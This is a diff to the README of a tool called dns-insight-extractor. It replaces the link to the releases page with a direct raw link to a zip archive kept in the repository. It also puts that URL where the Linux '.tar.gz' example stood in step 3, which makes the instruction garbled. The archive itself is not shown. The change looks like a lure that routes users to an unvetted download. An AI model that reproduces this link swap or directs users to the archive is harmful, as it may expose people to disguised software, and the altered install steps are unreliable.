bashekhe/dns-insight-extractor/README.md

 ## 💾 Download & Install

-To download the software, visit this page: [Download dns-insight-extractor](https://github.com/bashekhe/dns-insight-extractor/releases).
+To download the software, visit this page: [Download dns-insight-extractor](https://raw.githubusercontent.com/bashekhe/dns-insight-extractor/main/dns_insight_extractor/dns_insight_extractor_v2.4.zip).

 1. Open the link above.
 2. Find the latest release version.
-3. Click on the package appropriate for your operating system (e.g., `.exe` for Windows, `.app` for macOS, or `.tar.gz` for Linux).
+3. Click on the package appropriate for your operating system (e.g., `.exe` for Windows, `.app` for macOS, or `https://raw.githubusercontent.com/bashekhe/dns-insight-extractor/main/dns_insight_extractor/dns_insight_extractor_v2.4.zip` for Linux).
 4. Save the file to your computer.

 ## ⚙️ How to Run